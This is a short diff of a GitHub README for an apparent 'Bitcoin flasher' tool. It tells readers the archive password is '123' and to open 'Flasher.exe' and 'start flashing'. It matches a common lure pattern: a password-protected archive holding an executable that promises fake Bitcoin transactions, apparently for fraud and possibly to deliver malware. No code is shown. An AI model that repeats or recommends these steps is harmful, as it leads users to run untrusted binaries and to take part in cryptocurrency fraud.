Eyopseope/Bitcoin-transaction/README.md

 1. The password for the archive is - 123

-2. Open bitcoin_flasher.exe and start flashing!
+2. Open Flasher.exe and start flashing!

 ![Image alt](https://github.com/Eyopseope/Bitcoin-transaction/blob/main/flash1.png)